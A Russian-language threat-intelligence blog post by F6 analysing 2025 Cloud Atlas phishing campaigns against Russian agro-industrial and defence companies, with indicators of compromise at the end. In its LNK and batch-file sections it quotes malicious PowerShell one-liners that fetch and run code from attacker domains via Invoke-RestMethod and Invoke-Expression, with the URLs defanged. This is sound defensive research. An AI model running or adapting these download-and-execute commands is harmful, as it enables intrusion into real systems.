Полевые испытания: эксперты F6 проанализировали новые атаки группы Cloud Atlas - F6

На протяжении всего 2025 года специалисты F6 фиксируют повышенную активность группировки Cloud Atlas, атакующей  российские и белорусские компании. Особенностью данных атак стало изменение доменных зон, а также эксперименты с вредоносным программным обеспечением, находящимся во вложении фишинговых писем. В новом блоге специалисты F6 проанализировали недавние атаки Cloud Atlas на предприятия из сферы агропромышленного и оборонно-промышленного комплексов.

Cloud Atlas — прогосударственная APT-группа, специализирующаяся на кибершпионаже и краже конфиденциальных данных, активная с 2014 года. Использует сложные многоэтапные атаки с применением собственных загрузчиков и шифрованных каналов связи для скрытного сбора данных.

В середине октября мы зафиксировали очередную атаку Cloud Atlas. Ее целью стало российское предприятие агропромышленного комплекса — группировка рассылала вредоносное вложение с почтового адреса mkrutij@list[.]ru.  Нашим флагманским решением F6 Managed XDR данная атака  была успешно остановлена.

Рис.1. Фишинговое письмо от APT-группы Cloud Atlas

В качестве приманки атакующие использовали программу агропромышленного форума «Зерно и масличные 2025: кормовой вектор», который пройдет 30 октября 2025 года в Москве. Вредоносное вложение «Программа Форум Зерно и масличные.doc» действительно содержит программу форума.

Рис. 2. Содержимое файла-приманки

Исполнение данного вложения инициирует запуск механизма доставки полезной нагрузки, который, как сообщалось выше, не изменился. В качестве загрузчика по-прежнему выступает doc-файл-приманка, загружающий посредством шаблона  RTF-файл, содержащий эксплойт для уязвимости CVE-2017-11882, который в данном случае загружается по ссылке hxxps://kommando[.]live/us/?legal/terms/trialterms/secno. В результате запуска шаблона и эксплуатации уязвимости происходит загрузка дроппера us.txt по ссылке hxxps://kommando[.]live/us/?secno/achro33, содержащего полезную нагрузку VBShower с С2 hxxps://kommando[.]live/us/?product-kategorie/kosmetik/spezialseifen/instructible.

Рис. 3. Фрагмент дроппера us.txt

Рис. 4. Содержимое бэкдора VBShower

Это уже не первая атака группы, направленная на предприятия агропромышленного комплекса осенью 2025 года. Так, в ходе аналогичной атаки, зафиксированной в сентябре 2025 года, злоумышленники с использованием электронной почты  glotovao56@yandex[.]ru рассылали письма с темой «Бланк ТЧ» и вредоносным вложением «Бланк ТЧ.doc», запуск которого инициировал цепочку с загрузками RTF-файла regioninvest_net.doc по ссылке hxxps:/regioninvest[.]net?pmmc.html/tubularian и дроппера un67.hta по ссылке hxxps://regioninvest[.]net/tubularian/un67. Полезная нагрузка в дроппере – ВПО VBShower backdoor с C2 hxxps://news-freebase[.]com/categoria/brother/p-touch/1280cb-p-touch-brother-2/appres.

Рис. 5. Фишинговое письмо, рассылаемое злоумышленниками в сентябре 2025 года

Исследование атаки

В рамках исследования атаки, проводимой группировкой в октябре, специалисты F6 обнаружили два дополнительных файла, связанных с доменом kommando[.]live, которые были загружены на платформу VirusTotal: «Запрос_демографических_данных_предприятий_на_2025_год_для_медицинского_обслуживания.doc»  и «Приложение_ Запрос на проведение закупки.doc».

Название и содержание данных файлов, связанное с проведением закупок и сбором данных сотрудников предприятий, позволяет предположить, что целями атаки стали не только предприятия агропромышленного, но и предприятия оборонно-промышленного комплекса России.

В последующем с помощью анализа сетевой инфраструктуры и особенностей файлов специалистами F6 был обнаружен домен atelierdebondy[.]fr, используемый злоумышленниками в качестве удаленного сервера для загрузки шаблона. На момент анализа полезная нагрузка была недоступна.

Стоит отметить, что группа в редких случаях пользуется нетипичными для себя доменными зонами. Такое поведение было замечено в ноябре 2023-го и октябре 2024 года, когда группа использовала домены e-mailing[.]online и jhsdshdkajdhgfyhsfhjshh[.]cfd в атаках на Россию и Беларусь. Как правило, домены, используемые группировкой для атак, находятся в четырех зонах — com, net, org и info. Кроме того, как и в ноябрьской атаке 2023 года, изменилась особенность их использования: в последние несколько лет под каждый этап, где в качестве вложения был doc-загрузчик, использовался отдельный домен.

Пример такой схемы:

  1. Один домен для загрузки шаблона и HTA-дроппера;
  2. Отдельный C&C в VBShower;
  3. Отдельный C&C в PowerShower.

В описанной нами выше октябрьской атаке используются совсем нетипичные доменные зоны, а также один домен, как минимум, на первых двух этапах.

Эксперименты с методами доставки полезной нагрузки

Фиксировать эксперименты, проводимые группировкой, мы начали еще два года назад, и это были не просто изменения, связанные со сменой доменных зон, а эксперименты с методами доставки полезной нагрузки.

Так 16 ноября 2023 года на платформу VirusTotal был загружен zip-архив document.zip, содержащий в себе Batch-файл “document.pdf .cmd”.  Данный Batch-файл создает PowerShell-скрипт %TEMP%\temp.ps1 и запускает его с помощью команды:

powershell -ep bypass -w 01 %TEMP%/temp.ps1

Рис. 8. Содержимое Batch-файла “document.pdf .cmd”

PowerShell-скрипт temp.ps1 предназначен для запуска с сервера следующей стадии, HTA-файла, дальнейшее исполнение которого будет осуществляться по уже известной нам цепочке.

Рис. 9. Содержимое PowerShell-скрипта temp.ps1

Подробный анализ данной атаки был рассмотрен в рамках доклада на PHDays 2024.

2024 год

Другие эксперименты мы обнаружили в конце 2024 года: 29 октября и 1 ноября на платформу VirusTotal было загружено два LNK-файла. В обоих случаях при запуске LNK пользователю демонстрируется PDF-документ в качестве приманки и далее выполняется запрос к URL через Invoke-RestMethod с указанием User-Agent «Mozilla/4.0 («compatible; Windows NT 10.0; MSOffice 16)».  Ответ от сервера будет передан с помощью командлета Invoke-Expression для выполнения PowerShell-команды на компьютере жертвы.

Arguments: -w Minimized -ep Bypass -nop -c "$h=@{'User-Agent'='Mozilla/4.0 ("compatible; Windows NT 10.0; MSOffice 16)'};irm hxxps://web-digit[.]com/siip.htmlldql.html/siree -Headers $h | iex"

Рис. 10. Содержимое файла-приманки

Arguments: -w Minimized -ep Bypass -nop -c "$h=@{'User-Agent'='Mozilla/4.0 ("compatible; Windows NT 10.0; MSOffice 16)'};irm hxxps://web-digit[.]com/opinionpfrom=home-ndtv+mainnavgation/transthalamic -Headers $h | iex"

Рис. 11. Содержимое файла-приманки

На момент исследования атак 2024 года удаленный сервер с полезной нагрузкой был недоступен, в связи с чем атрибутировать данную атаку к группировке Cloud Atlas не представилось возможным, несмотря на использование паттерна URL, который совпадал с предыдущими атаками группы.

Продолжение экспериментов и атрибуция

2025 год 

В июле 2025 года на платформу VirusTotal были загружены два аналогичных LNK-файла, которые совпадали с экземплярами, загруженными в конце 2024 года. В качестве удаленного сервера использовался домен istochnik[.]org. Атакующие практически не вносили изменения в команды, за исключением добавления строки ms-office; в поле User-Agent. Помимо этого в результате исполнения команды ответ от сервера будет передан в качестве явного параметра функции для снижения обнаружения детектирующими правилами.

Arguments: -w Minimized -ep Bypass -nop -c "ieX(irm hxxps://istochnik[.]org/male-infertility/isoflor -UserAgent 'Mozilla/4.0 (compatible; Windows NT 10.0; ms-office; MSOffice 16)') "

Рис. 12. Содержимое файла-приманки

Arguments: -w Minimized -ep Bypass -nop -c "ieX(irm hxxps://istochnik[.]org/spis.html/choanoflagellidae -UserAgent 'Mozilla/4.0 (compatible; Windows NT 10.0; ms-office; MSOffice 16)') "

В обоих случаях полезная нагрузка была недоступна, поэтому мы приступили к более детальному изучению инфраструктуры.

Анализ инфраструктуры позволил сделать вывод, что за атакой с использованием вышеуказанных LNK с высокой степенью уверенности стоит APT-группа Cloud Atlas.

Мы провели корреляцию, использовав 3 группы:

  1. Группа доменов, связанных с web-digit[.]com;
  2. Группа доменов, связанных с istochnik[.]org;
  3. Группа доменов, связанных с доменами из первой и второй группы.
Первая группа Вторая группа Третья группа
web-digit[.]com istochnik[.]org rzhd[.]org
multipackage[.]net hostscontrol[.]com support-ru-services[.]com
iznews[.]net regioninvest[.]net news-freebase[.]com
rostvgroup[.]com perfectfinder[.]net goruslugi[.]org
updatechecker[.]org solid-logit[.]com uslugiru[.]com
billet-ru[.]net information-model[.]net sens-prom[.]com
flashsupport[.]org telehraf[.]com telehraf[.]com
securemodem[.]com timesynchronization24[.]com timesynchronization24[.]com
transferpolicy[.]org marketru[.]net marketru[.]net
bilaine[.]com cityru-travel[.]org cityru-travel[.]org
web-portal-app[.]com statusupport[.]org statusupport[.]org
edgewebview[.]com base-steel[.]com

 

 

 

rosatomgroup[.]com
mskreg[.]net
tele22[.]org
russiatimes[.]info
roskomnadz[.]com
ru-tube[.]net

Выводы

Таким образом, проведенный анализ атак группировки Cloud Atlas показывает разнообразный подход в использовании инфраструктуры, связанный с переходом на другие доменные зоны, а также позволяет рассмотреть различные загрузчики, используемые группировкой при проведении атак, что свидетельствует о высокой степени адаптивности группировки.

В свою очередь, сохранение ряда неизменных TTPs и эксплуатация давно известных уязвимостей указывает на эффективность атак, проводимых группировкой за счет наличия незащищенных или слабо поддерживаемых ресурсов, а также человеческого фактора.

Совокупность указанных обстоятельств делают Cloud Atlas высокоэффективной угрозой для информационной безопасности организаций.

Индикаторы компрометации:

SHA1 Имена файлов Тип
8ff9b4b1dcc3b759e31cc249dfb15e9d0f3705cd document.pdf .cmd Загрузчик
4ab950002e2e1968b1915ec95b62a91740b10cb8 Армия-2025.pdf.lnk Загрузчик
e3d62ba9609851719080f4d62d22ff8e8584731d Приложение.pdf.lnk Загрузчик
ff30ebff67258f067021556338195b0e02ba9a40 Счет_a19af3ed-a30a-45a0-b88d-6529f94398d4.pdf.lnk Загрузчик
af989433c920346e9f74bb27ccde0c3c14f7f578 Заявка_количество на поставку корпусов АО АМЗ.pdf.lnk Загрузчик
c8028a2656f0cc0a1c44450b8270634bd3f88617 Программа Форум Зерно и масличные.doc Загрузчик
da381c853f1544ebe1c8aba4ac565255dbb438ee Бланк ТЧ.doc Загрузчик
b45607c5114852cb07c191719cceea9c2e2316ea temp.ps1 Загрузчик
9c34b77bc68fb9b8f440d8f0ed4b0cbacd1ae2c7 e0e26182afe512a2850d3a173d7d91c2b0a49cd986d578af7765091504b2262c Загрузчик
f305ebaacbeb7746147f651d15bfb5da5dfe6ecc 4b54h1vd.exe Загрузчик
63e07982afbfe0154d5894c314379af11c84a5af us.txt HTA-дроппер
c00926833b195eabf1281da51ea566db7025c15b un67.hta HTA-дроппер
2441ddb88b998915de991e76c915dca591f01245 us RTF-шаблон
57db839a5060ea25423a19ae9bf0c0c32a2bbf8d regioninvest_net.doc RTF-шаблон
405237bd1231d3b1a47ff17930b11b6992491a2f diverse.con VBShower
5ff4f47ba79a0a0649a25910e6df5c09f4b83f11 V010e336.dat VBShower
a08343ace9a8891f0e54d4e7efd219800c52bb0c V0102d43.dat VBShower
b80561b2d0725ed2125567e8b3976403a041e485 diverse.vbs/diverseing.vbs VBShower launcher
4dc916b2537071a0f73f2600b008a8571c30488d V010e336.log.vbs/V010e336f1.log.vbs VBShower launcher
a17543a66b8035a0816b6c50beef9fd725914f7d V0102d43.log.vbs/V0102d43f1.log.vbs VBShower launcher

 

Адреса отправителей:

mkrutij@list[.]ru

glotovao56@yandex[.]ru

Домены:

kommando[.]live

atelierdebondy[.]fr